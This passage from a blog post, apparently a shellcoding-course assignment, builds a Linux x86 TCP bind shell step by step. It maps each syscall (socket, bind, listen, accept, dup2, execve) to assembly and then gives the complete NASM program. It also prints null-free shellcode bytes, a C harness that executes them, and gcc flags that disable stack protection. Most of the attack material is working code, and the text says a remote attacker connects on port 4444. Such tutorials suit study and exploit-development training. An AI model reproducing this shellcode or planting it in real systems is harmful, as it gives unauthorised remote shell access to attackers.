Execute the shell <\/li><\/ol>\n\n\n\nAs mentioned earlier, our aim is to translate each section of code in x86 assembly. Each function invoked in this C code actually corresponds to an underlying sycall in Linux. Let us walk through each syscall, identify the values that need to be passed and craft the corresponding assembly code.<\/p>\n\n\n\n
Create a Socket<\/h2>\n\n\n\n The first step is to create a socket. The relevant C code snippet is below:<\/p>\n\n\n\n
host_sockid = socket(PF_INET, SOCK_STREAM, 0);\u00a0<\/pre>\n\n\n\nThe C code tells us that the socket <\/em>syscall needs to be invoked. A quick reference to the \/usr\/include\/i386-linux-gnu\/asm\/unistd_32.h<\/em><\/code> file reveals the syscall number of the socketcall <\/em>syscall<\/p>\n\n\n\n#define __NR_socketcall 102<\/pre>\n\n\n\nThe sycall number associated with socketcall <\/em>is 102<\/code>. The man reference shows the parameters of this syscall:<\/p>\n\n\n\nint socketcall(int call, unsigned long *args);<\/pre>\n\n\n\nWe can reference the different function call of socketcall <\/em>syscall in \/usr\/include\/linux\/net.h<\/em><\/code>. Following snippet shows the syscalls we need to invoke for a TCP bind shell. Please make a note as this will be referenced in later parts of the post too.<\/p>\n\n\n\n#ifndef _LINUX_NET_H\n#define _LINUX_NET_H\n\n#include <linux\/socket.h>\n#include <asm\/socket.h>\n\n#define NPROTO AF_MAX\n\n#define SYS_SOCKET 1 \/* sys_socket(2) *\/\n#define SYS_BIND 2 \/* sys_bind(2) *\/\n#define SYS_CONNECT 3 \/* sys_connect(2) *\/\n#define SYS_LISTEN 4 \/* sys_listen(2) *\/\n#define SYS_ACCEPT 5 \/* sys_accept(2) *\/<\/pre>\n\n\n\nAs shown, to create a socket, the value of the call <\/em>will be “1”<\/em>. The args<\/em> will then point to arguments of socket<\/em> syscall.<\/p>\n\n\n\nSyscall<\/th> Argument<\/th> Man reference<\/th> C code reference<\/th> Value<\/th><\/tr><\/thead> socketcall<\/td> call<\/td> Determines which socket function to invoke<\/td> NA<\/td> 1<\/td><\/tr> socketcall<\/td> args<\/td> Points to a block containing the actual arguments<\/td> NA<\/td> <address of socket syscall arguments><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nThe man reference of the socket <\/em>syscall is below:<\/p>\n\n\n\nint socket(int domain, int type, int protocol);\n<\/pre>\n\n\n\nLet’s look at each argument and refer our proof of concept C code for values being passed in it.<\/p>\n\n\n\nSyscall<\/th> Argument<\/th> Man reference<\/th> C code reference<\/th><\/tr><\/thead> socket<\/td> domain<\/td> Specifies a communication domain; this selects the protocol family which will be used for communication<\/td> PF_INET<\/td><\/tr> socket<\/td> type<\/td> The socket has the indicated type, which specifies the communication semantics<\/td> SOCK_STREAM<\/td><\/tr> socket<\/td> protocol<\/td> Specifies a particular protocol to be used with the socket<\/td> 0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nThe value of domain can be found at\/usr\/include\/i386-linux-gnu\/bits\/socket.h<\/em><\/code>; which refers to the IPv4 family. PF_INET is a synonym for AF_INET.<\/p>\n\n\n\n#define PF_INET 2 \/* IP protocol family. *\/\n#define AF_INET PF_INET\n<\/pre>\n\n\n\nThe value of type can be found at\/usr\/include\/i386-linux-gnu\/bits\/socket_type.h<\/em><\/code>; which refers to connection oriented stream.<\/p>\n\n\n\n SOCK_STREAM = 1, \/* Sequenced, reliable, connection-based byte streams. *\/<\/pre>\n\n\n\nThe value of protocol can be found at\/usr\/include\/linux\/in.h<\/em><\/code>; which refers to TCP protocol<\/p>\n\n\n\nIPPROTO_IP = 0, \/* Dummy protocol for TCP *\/<\/pre>\n\n\n\nThe table below is updated with values of all arguments for socketcall <\/em>syscall which calls socket <\/em>syscall.<\/p>\n\n\n\nSyscall<\/th> Argument<\/th> Man reference<\/th> C code reference<\/th> Value<\/th><\/tr><\/thead> socketcall<\/td> call<\/td> Determines which socket function to invoke<\/td> NA<\/td> EBX – 1<\/td><\/tr> socketcall<\/td> args<\/td> Points to a block containing the actual arguments<\/td> NA<\/td> ECX – <address of arguments of socket syscall><\/td><\/tr> socket<\/td> domain<\/td> Specifies a communication domain; this selects the protocol family which will be used for communication<\/td> PF_INET<\/td> 2<\/td><\/tr> socket<\/td> type<\/td> The socket has the indicated type, which specifies the communication semantics<\/td> SOCK_STREAM<\/td> 1<\/td><\/tr> socket<\/td> protocol<\/td> Specifies a particular protocol to be used with the socket<\/td> 0<\/td> 0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nAs we have the all the data with us, we can now move forward to write the assembly code to create a socket. <\/p>\n\n\n\n
global _start\n\nsection .text\n\n_start:\n\n; Creating a socket\n\n ; move decimal 102 in eax - socketcall syscall\n xor eax, eax\n mov al, 0x66 ;converted to hex\n\n ; set the call argument to 1 - SOCKET syscall\n xor ebx, ebx\n mov bl, 0x1\n\n ; push value of protocol, type and domain on stack - socket syscall\n ; int socket(int domain, int type, int protocol);\n ; arguments pushed in reverse order\n xor ecx, ecx\n push ecx ; Protocol = 0\n push 0x1 ; Type = 1 (SOCK_STREAM)\n push 0x2 ; Domain = 2 (AF_INET)\n\n ; set value of ecx to point to top of stack - points to block of arguments for socketcall syscall\n mov ecx, esp\n\n int 0x80<\/pre>\n\n\n\nThis completes our first and important stage of the assembly program. We can now follow the same approach in evaluating other sycalls and writing the assembly code.<\/p>\n\n\n\n
Bind the Socket<\/h2>\n\n\n\n The relevant C code snippet for bind syscall is below:<\/p>\n\n\n\n
\/\/ Initialize sockaddr struct to bind socket using it \n hostaddr.sin_family = AF_INET; \/\/ server socket type address family = internet protocol address\n hostaddr.sin_port = htons(4444); \/\/ server port, converted to network byte order\n hostaddr.sin_addr.s_addr = htonl(INADDR_ANY); \/\/ listen to any address, converted to network byte order\n\n \/\/ Bind socket to IP\/Port in sockaddr struct \n bind(host_sockid, (struct sockaddr*) &hostaddr, sizeof(hostaddr)); <\/pre>\n\n\n\nWe will invoke bind <\/em>syscall function from socketcall <\/em>syscall. To bind the socket, the value of the call <\/em>will be “2”<\/em> (as referenced from net.h <\/em>earlier). The args<\/em> will then point to arguments of bind <\/em>syscall.<\/p>\n\n\n\nThe man reference of the bind <\/em>syscall is below:<\/p>\n\n\n\nint bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);<\/pre>\n\n\n\nAgain, let’s look at each argument and refer our proof of concept C code for values being passed in it.<\/p>\n\n\n\nSyscall<\/th> Argument<\/th> Man reference<\/th> C code reference<\/th><\/tr><\/thead> socketcall<\/td> call<\/td> Determines which socket function to invoke<\/td> NA<\/td><\/tr> socketcall<\/td> args<\/td> Points to a block containing the actual arguments<\/td> NA<\/td><\/tr> bind<\/td> sockfd<\/td> bind() assigns the address specified by addr to the host_sockid<\/td><\/tr> bind<\/td> addr<\/td> bind() assigns the address specified by addr to the &hostaddr<\/td><\/tr> bind<\/td> addrlen<\/td> addrlen specifies the size, in bytes, of the address structure pointed to by addr<\/td> sizeof(hostaddr)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nThe first argument, which is sockfd, <\/em>is nothing but the return value of previous syscall; which is a socket file descriptor returned by socket <\/em>syscall.<\/p>\n\n\n\nThe addr <\/em>argument is a bit interesting. If you look closely in the man reference, you will notice that addr <\/em>points to sockaddr <\/em>structure, which is defined as follows:<\/p>\n\n\n\nstruct sockaddr_in {\n short int sin_family;\n unsigned short int sin_port;\n struct in_addr sin_addr;\n unsigned char sin_zero[8];\n};<\/pre>\n\n\n\nLet’s port this structure into a table and map it to the C code<\/p>\n\n\n\nStructure elements<\/th> Description<\/th> C reference<\/th><\/tr><\/thead> sin_family<\/td> Represents an address family<\/td> AF_INET<\/td><\/tr> sin_port<\/td> 16-bit port number in Network Byte Order<\/td> 4444<\/td><\/tr> sin_addr<\/td> 32-bit IP address in Network Byte Order<\/td> INADDR_ANY<\/td><\/tr> sin_zero<\/td> Not used<\/td> NA<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nAs the address family is IPv4, the value of sin_family <\/em>will PF_INET\/AF_INET and the integer value will be same as that in previous syscall.<\/p>\n\n\n\nLet’s keep the value of sin_port <\/em>as 4444; the port on which our shell will listen and the remote attacker will connect. 4444 converts to 115c<\/em> in hex. To push it onto the stack, we need to reverse the order i.e 5c11<\/em>; which is due to little endian<\/em> format.<\/p>\n\n\n\nWe want our port to listen all all interfaces, so the equivalent of INADDR_ANY will be 0.0.0.0, if needs to be passed as value in registers.<\/p>\n\n\n\n
The last argument addrlen <\/em>will be 16<\/em>, which is the size of sockaddr_in<\/em> structure<\/p>\n\n\n\nThe table below is updated with values of all arguments for socketcall <\/em>syscall, which calls the bind <\/em>syscall:<\/p>\n\n\n\nSyscall<\/th> Argument<\/th> Man reference<\/th> C code reference<\/th> Value<\/th><\/tr><\/thead> socketcall<\/td> call<\/td> Determines which socket function to invoke<\/td> NA<\/td> EBX – 2<\/td><\/tr> socketcall<\/td> args<\/td> Points to a block containing the actual arguments<\/td> NA<\/td> ECX – <address of arguments of bind syscall><\/td><\/tr> bind<\/td> sockfd<\/td> bind() assigns the address specified by addr to the host_sockid<\/td> EDX – <return value from socket syscall><\/td><\/tr> bind<\/td> addr<\/td> bind() assigns the address specified by addr to the &hostaddr<\/td> ESI – <address of sockaddr_in struct><\/td><\/tr> bind<\/td> addrlen<\/td> addrlen specifies the size, in bytes, of the address structure pointed to by addr<\/td> sizeof(hostaddr)<\/td> 16<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nThe values for sockaddr_in<\/em> structure is also summarized below:<\/p>\n\n\n\nStructure elements<\/th> Description<\/th> C reference<\/th> Value<\/th><\/tr><\/thead> sin_family<\/td> Represents an address family<\/td> AF_INET<\/td> 2<\/td><\/tr> sin_family<\/td> 16-bit port number in Network Byte Order<\/td> 4444<\/td> 0x5c11<\/td><\/tr> sin_addr<\/td> 32-bit IP address in Network Byte Order<\/td> INADDR_ANY<\/td> 0x00000000<\/td><\/tr> sin_zero<\/td> Not used<\/td> NA<\/td> NA<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/span>Using the above information, the following assembly code for bind <\/em>syscall is created.<\/p>\n\n\n\n; Binding a socket\n\n ; save return value of socket syscall - socket file descriptor\n xor edx, edx\n mov edx, eax\n\n ; move decimal 102 in eax - socketcall syscall\n mov al, 0x66 ;converted to hex\n\n ; set the call argument to 2 - bind syscall\n mov bl, 0x2\n\n ; push sockaddr structure on the stack\n ; struct sockaddr {\n ; sa_family_t sa_family;\n ; char sa_data[14];\n ; }\n xor ecx, ecx\n push ecx ; s_addr = any(0.0.0.0)\n push word 0x5c11 ; port = 4444\n push word 0x2 ; family = AF_INET\n\n mov esi, esp ; save address of sockaddr struct\n\n ; push values of addrlen, addr and sockfd on the stack\n ; bind(host_sockid, (struct sockaddr*) &hostaddr, sizeof(hostaddr));\n push 0x10 ; strlen =16\n push esi ; address of sockaddr structure\n push edx ; file descriptor returned from socket syscall\n\n ; set value of ecx to point to top of stack - points to block of arguments for bind syscall\n mov ecx, esp\n int 0x80<\/pre>\n\n\n\nListen for a connection<\/h2>\n\n\n\n The relevant C code snippet for the listen function is below:<\/p>\n\n\n\n
\u00a0\u00a0\u00a0 \/\/ Listen for incoming connections\u00a0\n\u00a0\u00a0\u00a0 listen(host_sockid, 2);\u00a0\n<\/pre>\n\n\n\nWe will invoke listen <\/em>syscall function from socketcall <\/em>syscall. To listen, the value of the call <\/em>will be “4”<\/em> (as referenced from net.h <\/em>earlier). The args<\/em> will then point to arguments of listen <\/em>syscall.<\/p>\n\n\n\nThe man reference of the listen <\/em>syscall is below:<\/p>\n\n\n\n int listen(int sockfd, int backlog);<\/pre>\n\n\n\nThe arguments and reference to C code is below:<\/p>\n\n\n\nSyscall<\/th> Argument<\/th> Man reference<\/th> C code reference<\/th><\/tr><\/thead> socketcall<\/td> call<\/td> Determines which socket function to invoke<\/td> NA<\/td><\/tr> socketcall<\/td> args<\/td> Points to a block containing the actual arguments<\/td> NA<\/td><\/tr> listen<\/td> sockfd<\/td> File descriptor that refers to a socket of type SOCK_STREAM or SOCK_SEQPACKET<\/td> host_sockid<\/td><\/tr> listen<\/td> backlog<\/td> Defines the maximum length to which the queue of pending connections for sockfd may grow<\/td> 2<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nThe first argument, sockfd, <\/em>is same as in bind <\/em>sycall, which the return value of socket <\/em>syscall.<\/p>\n\n\n\nArgument backlog<\/em> defines a queue limit for incoming connections. After the queue is full, the connecting clients will get a connection refused error. Let’s keep this value same as in the C code.<\/p>\n\n\n\nThe table below is updated with values of all arguments for socketcall <\/em>syscall, which calls the listen <\/em>syscall:<\/p>\n\n\n\nSyscall<\/th> Argument<\/th> Man reference<\/th> C code reference<\/th> Value<\/th><\/tr><\/thead> socketcall<\/td> call<\/td> Determines which socket function to invoke<\/td> NA<\/td> EBX – 4<\/td><\/tr> socketcall<\/td> args<\/td> Points to a block containing the actual arguments<\/td> NA<\/td> ECX – <address of arguments of listen syscall><\/td><\/tr> listen<\/td> sockfd<\/td> File descriptor that refers to a socket of type SOCK_STREAM or SOCK_SEQPACKET<\/td> host_sockid<\/td> EDX – <return value of socket syscall><\/td><\/tr> listen<\/td> backlog<\/td> Defines the maximum length to which the queue of pending connections for sockfd may grow<\/td> 2<\/td> 2<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nUsing the above information, the following assembly code for listen <\/em>syscall is created.<\/p>\n\n\n\n; Listen for a connection\n\n ; move decimal 102 in eax - socketcall syscall\n mov al, 0x66 ;converted to hex\n\n ; set the call argument to 4 - listen syscall\n mov bl, 0x4\n\n ; push arguments for socketcall syscall\n ; int listen(int sockfd, int backlog)\n push byte 0x2\n push edx\n\n ;set value of ecx to point ot top of stack - points to block of arguments for listen syscall\n mov ecx, esp\n int 0x80\n<\/pre>\n\n\n\nAccept Incoming Connection<\/h2>\n\n\n\n The relevant C code snippet for accept<\/em> syscall is below:<\/p>\n\n\n\n\/\/ Accept incoming connection\u00a0\n\u00a0\u00a0\u00a0 client_sockid = accept(host_sockid, NULL, NULL);\u00a0<\/pre>\n\n\n\nWe will invoke accept <\/em>syscall function from socketcall <\/em>syscall. To accept the incoming connection, the value of the call <\/em>will be “5”<\/em> (as referenced from net.h <\/em>earlier). The args<\/em> will then point to arguments of accept <\/em>syscall.<\/p>\n\n\n\nThe man reference of the accept <\/em>syscall is below:<\/p>\n\n\n\nint accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);<\/pre>\n\n\n\nThis is pretty straightforward. The value of argument sockfd <\/em>will be same as that in previous syscalls i.e. return value of socket <\/em>syscall. The next two arguments can be ignored and set to “0”<\/em> as they are used to capture the connecting client’s details, which we do not wish to capture. So, the values of arguments for socketcall <\/em>syscall and accept <\/em>sycall are below:<\/p>\n\n\n\n<\/p>\n\n\n\nSyscall<\/th> Argument<\/th> Man reference<\/th> C code reference<\/th> Value<\/th><\/tr><\/thead> socketcall<\/td> call<\/td> Determines which socket function to invoke<\/td> NA<\/td> EBX – 5<\/td><\/tr> socketcall<\/td> args<\/td> Points to a block containing the actual arguments<\/td> NA<\/td> ECX – <address of arguments of accept syscall><\/td><\/tr> accept<\/td> sockfd<\/td> File descriptor that refers to a socket of type SOCK_STREAM or SOCK_SEQPACKET<\/td> host_sockid<\/td> EDX – <return value of socket syscall><\/td><\/tr> accept<\/td> addr<\/td> Pointer to a sockaddr structure; filled in with the address of the peer socket<\/td> NULL<\/td> 0<\/td><\/tr> accept<\/td> addrlen<\/td> Value-result argument: the caller must initialize it to contain the size (in bytes) of the structure pointed to by addr<\/td> NULL<\/td> 0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nUsing the above information, the following assembly code for accept <\/em>syscall is created.<\/p>\n\n\n\n; Accept a connection\n\n ; move decimal 102 in eax - socketcall syscall\n mov al, 0x66\n\n\n ; set the call argument to 5 - accept syscall\n mov bl, 0x5\n\n ; push arguments for socketcall syscall\n ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)\n xor ecx, ecx\n push ecx\n push ecx\n push edx\n\n ;set value of ecx to point ot top of stack - points to block of arguments for listen syscall\n mov ecx, esp\n int 0x80\n<\/pre>\n\n\n\nRedirect STDIN, STDOUT and STDERR via DUP2<\/h2>\n\n\n\n For the bind shell to be interactive and to actually work, we need to redirect the STDIN, STDOUT and STDERR to client socket file descriptor created in previous syscall.<\/p>\n\n\n\n
The relevant C code snippet for dup2 <\/em>syscall is below:<\/p>\n\n\n\n\/\/ Duplicate file descriptors for STDIN, STDOUT and STDERR\u00a0\n dup2(client_sockid, 0);\u00a0\n\u00a0dup2(client_sockid, 1);\u00a0\n\u00a0dup2(client_sockid, 2);\u00a0<\/pre>\n\n\n\n The man reference of dup2<\/em> syscall is below:<\/p>\n\n\n\nint dup2(int oldfd, int newfd);<\/pre>\n\n\n\nThe dup2<\/em> system call creates a copy of the file descriptor oldfd<\/em>, using the file descriptor number specified in newfd<\/em>. So, we will need to loop over dup2 <\/em>call three times to map STDIN, STDOUT, STDERR to 0, 1 and 2 respectively.<\/p>\n\n\n\nSyscall<\/th> Argument<\/th> Man reference<\/th> C code reference<\/th> Value<\/th><\/tr><\/thead> dup2<\/td> oldfd<\/td> file descriptor<\/td> client_sockid<\/td> EBX – <return value from accept syscall – client socket file descriptor><\/td><\/tr> accept<\/td> newfd<\/td> file descriptor<\/td> 0, 1 and 2 (three syscalls)<\/td> 0, 1 and 2 (three syscalls)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nUsing the above information, the following assembly code for dup2 <\/em>syscalls is created.<\/p>\n\n\n\n; Duplicate file descriptors\n\n ; eax holds return value of previous syscall - accept - client_sockid\n ; client socket file descriptor\n push eax\n\n ; push arguments for dup2 syscall\n ; int dup2(int oldfd, int newfd);\n ; dup2 syscall - setting STDIN;\n mov al, 0x3f ; move decimal 63; coverted to hex - dup2 syscall\n pop ebx ; set ebx to client sockid\n xor ecx, ecx\n int 0x80\n\n ; dup2 syscall - setting STDOUT\n mov al, 0x3f ; move decimal 63; coverted to hex - dup2 syscall\n mov cl, 0x1\n int 0x80\n\n ; dup2 syscall - setting STDERR\n mov al, 0x3f ; move decimal 63; coverted to hex - dup2 syscall\n mov cl, 0x2\n int 0x80\n<\/pre>\n\n\n\nExecute \/bin\/sh<\/h2>\n\n\n\n We are almost at the end of the post. We have successfully knitted the program to handle the sockets. Now once the client connects, we need to execute \/bin\/sh<\/em> to spawn a shell. For this, we need execve <\/em>syscall.<\/p>\n\n\n\nThe relevant C code snippet for execve <\/em>syscall is below:<\/p>\n\n\n\n\/\/ Execute \/bin\/sh\u00a0\nexecve(\"\/bin\/sh\", NULL, NULL);\u00a0<\/pre>\n\n\n\nThe man reference of the execve <\/em>syscall is below:<\/p>\n\n\n\nint execve(const char *pathname, char *const argv[], char *const envp[]);<\/pre>\n\n\n\nThe only part interesting for us is the pointer to pathname<\/em>, which is the file which we want to execute. In our case, that is \/bin\/sh. <\/p>\n\n\n\nAs “\/bin\/sh”<\/em> is of 7 bytes, we can add an additional “\/”<\/em> to make it 8, which is easier for us to push on the stack. So, pathname <\/em>will be “\/\/bin\/sh” (which is same as \/bin\/sh<\/em>; adding “\/”<\/em> does not make a difference !)<\/p>\n\n\n\nAs mentioned previously, “\/\/bin\/sh” <\/em>will be pushed on the stack in reverse due to little endian format. Also, as we are dealing with filename\/string, this has to be null terminated.<\/p>\n\n\n\nThe final data looks like this:<\/p>\n\n\n\n
<\/p>\n\n\n\nSyscall<\/th> Argument<\/th> Man reference<\/th> C code reference<\/th> Value<\/th><\/tr><\/thead> execve<\/td> *pathname<\/td> Execve() executes the program referred to by pathname<\/td> \/bin\/sh<\/td> hs\/nib\/\/0x00000000 execve<\/td> argv[]<\/td> Array of pointers to strings passed to the new program as its command-line arguments<\/td> NULL<\/td> 0<\/td><\/tr> execve<\/td> envp[]<\/td> Array of pointers to strings, conventionally of the form key=value, which are passed as the environment of the new program<\/td> NULL<\/td> 0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nTranslating this to assembly, we have the following code:<\/p>\n\n\n\n
; Execute \/bin\/sh\n\n ; exeve syscall\n mov al, 0xb\n\n ; int execve(const char *pathname, char *const argv[], char *const envp[]);\n ; push \/\/bin\/sh on stack\n xor ebx, ebx\n push ebx ; Null\n push 0x68732f6e ; hs\/n : 68732f6e\n push 0x69622f2f ; ib\/\/ : 69622f2f\n mov ebx, esp\n\n xor ecx, ecx\n xor edx, edx\n\n int 0x80\n<\/pre>\n\n\n\nThat’s it ! We have drafted the shellcode completely. The complete program is as follows:<\/p>\n\n\n\n
; Purpose: Linux x86 Bind Shell\n; Author: Mohit Suyal (@mosunit)\n; Studen ID: PA-16521\n; Blog: https:\/\/mosunit.com\n\nglobal _start\n\nsection .text\n\n_start:\n\n; Creating a socket\n\n ; move decimal 102 in eax - socketcall syscall\n xor eax, eax\n mov al, 0x66 ;converted to hex\n\n ; set the call argument to 1 - SOCKET syscall\n xor ebx, ebx\n mov bl, 0x1\n\n ; push value of protocol, type and domain on stack - socket syscall\n ; int socket(int domain, int type, int protocol);\n ; arguments pushed in reverse order\n xor ecx, ecx\n push ecx ; Protocol = 0\n push 0x1 ; Type = 1 (SOCK_STREAM)\n push 0x2 ; Domain = 2 (AF_INET)\n\n ; set value of ecx to point to top of stack - points to block of arguments for socketcall syscall\n mov ecx, esp\n\n int 0x80\n\n; Binding a socket\n\n ; save return value of socket syscall - socket file descriptor\n xor edx, edx\n mov edx, eax\n\n ; move decimal 102 in eax - socketcall syscall\n mov al, 0x66 ;converted to hex\n\n ; set the call argument to 2 - bind syscall\n mov bl, 0x2\n\n ; push sockaddr structure on the stack\n ; struct sockaddr {\n ; sa_family_t sa_family;\n ; char sa_data[14];\n ; }\n xor ecx, ecx\n push ecx ; s_addr = any(0.0.0.0)\n push word 0x5c11 ; port = 4444\n push word 0x2 ; family = AF_INET\n\n mov esi, esp ; save address of sockaddr struct\n\n ; push values of addrlen, addr and sockfd on the stack\n ; bind(host_sockid, (struct sockaddr*) &hostaddr, sizeof(hostaddr));\n push 0x10 ; strlen =16\n push esi ; address of sockaddr structure\n push edx ; file descriptor returned from socket syscall\n\n ; set value of ecx to point to top of stack - points to block of arguments for bind syscall\n mov ecx, esp\n int 0x80\n\n; Listen for a connection\n\n ; move decimal 102 in eax - socketcall syscall\n mov al, 0x66 ;converted to hex\n\n ; set the call argument to 4 - listen syscall\n mov bl, 0x4\n\n ; push arguments for socketcall syscall\n ; int listen(int sockfd, int backlog)\n push byte 0x2\n push edx\n\n ;set value of ecx to point ot top of stack - points to block of arguments for listen syscall\n mov ecx, esp\n int 0x80\n\n; Accept a connection\n\n ; move decimal 102 in eax - socketcall syscall\n mov al, 0x66\n\n\n ; set the call argument to 5 - accept syscall\n mov bl, 0x5\n\n ; push arguments for socketcall syscall\n ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)\n xor ecx, ecx\n push ecx\n push ecx\n push edx\n\n ;set value of ecx to point ot top of stack - points to block of arguments for listen syscall\n mov ecx, esp\n int 0x80\n\n; Duplicate file descriptors\n\n ; eax holds return value of previous syscall - accept - client_sockid\n ; client socket file descriptor\n push eax\n\n ; push arguments for dup2 syscall\n ; int dup2(int oldfd, int newfd);\n ; dup2 syscall - setting STDIN;\n mov al, 0x3f ; move decimal 63; coverted to hex - dup2 syscall\n pop ebx ; set ebx to client sockid\n xor ecx, ecx\n int 0x80\n\n ; dup2 syscall - setting STDOUT\n mov al, 0x3f ; move decimal 63; coverted to hex - dup2 syscall\n mov cl, 0x1\n int 0x80\n\n ; dup2 syscall - setting STDERR\n mov al, 0x3f ; move decimal 63; coverted to hex - dup2 syscall\n mov cl, 0x2\n int 0x80\n\n; Execute \/bin\/sh\n\n ; exeve syscall\n mov al, 0xb\n\n ; int execve(const char *pathname, char *const argv[], char *const envp[]);\n ; push \/\/bin\/sh on stack\n xor ebx, ebx\n push ebx ; Null\n push 0x68732f6e ; hs\/n : 68732f6e\n push 0x69622f2f ; ib\/\/ : 69622f2f\n mov ebx, esp\n\n xor ecx, ecx\n xor edx, edx\n\n int 0x80\n<\/pre>\n\n\n\nThe next step is to assemble and link the the code.<\/p>\n\n\n\n
root@kali:~\/slae\/assignments\/assignment-1# nasm -f elf32 -o bind_shell_x86.o bind_shell.nasm\n\nroot@kali:~\/slae\/assignments\/assignment-1# ld -o bind_shell_x86 bind_shell_x86.o\n\nroot@kali:~\/slae\/assignments\/assignment-1# ls -l |grep x86\n-rwxr-xr-x 1 root root 4600 Jul 10 14:56 bind_shell_x86\n-rw-r--r-- 1 root root 544 Jul 10 14:56 bind_shell_x86.o\n\nroot@kali:~\/slae\/assignments\/assignment-1# file bind_shell_x86\nbind_shell_x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped\n\n<\/pre>\n\n\n\nAs shown above, the ouput is an elf executable. Let’s extract the shellcode from this by using an awesome command line magic taught by Vivek, which has been extracted from Commandlinefu<\/a><\/p>\n\n\n\nThe output is a neat shellcode, which can be directly embedded in our shellcode tester program in C. Also, note that the shellcode is free from any null bytes.<\/p>\n\n\n\n
root@kali:~\/slae\/assignments\/assignment-1# objdump -d bind_shell_x86 |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\\t' ' '|sed 's\/ $\/\/g'|sed 's\/ \/\\\\x\/g'|paste -d '' -s |sed 's\/^\/\"\/'|sed 's\/$\/\"\/g'\n\"\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\x31\\xc9\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x31\\xd2\\x89\\xc2\\xb0\\x66\\xb3\\x02\\x31\\xc9\\x51\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe6\\x6a\\x10\\x56\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x04\\x6a\\x02\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x05\\x31\\xc9\\x51\\x51\\x52\\x89\\xe1\\xcd\\x80\\x50\\xb0\\x3f\\x5b\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80\"<\/pre>\n\n\n\nOur C code looks like this once the shellcode is embedded:<\/p>\n\n\n\n
#include <stdio.h>\n#include <string.h>\n\nunsigned char code[] = \\\n\"\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\x31\\xc9\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x31\\xd2\\x89\\xc2\\xb0\\x66\\xb3\\x02\\x31\\xc9\\x51\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe6\\x6a\\x10\\x56\\x52\\x89\\xe1\\xcd\\x80\n\\xb0\\x66\\xb3\\x04\\x6a\\x02\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x05\\x31\\xc9\\x51\\x51\\x52\\x89\\xe1\\xcd\\x80\\x50\\xb0\\x3f\\x5b\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb0\\x0b\\x31\\\nxdb\\x53\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80\";\n\nmain()\n\n{\n printf(\"Shellcode length: %d\\n\", strlen(code));\n int (*ret)() = (int(*)())code;\n ret();\n}<\/pre>\n\n\n\nThe final step is to compile this using gcc. <\/em>We need to add fno-stack-protector<\/code> to unprotect the stack and execstack<\/code> to make the stack executable.<\/p>\n\n\n\nroot@kali:~\/slae\/assignments\/assignment-1# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode\nshellcode.c:7:1: warning: return type defaults to \u2018int\u2019 [-Wimplicit-int]\n 7 | main()\n | ^~~~\n<\/pre>\n\n\n\nLet’s run it and connect to port 4444 to check if a shell is spawned<\/p>\n\n\n\n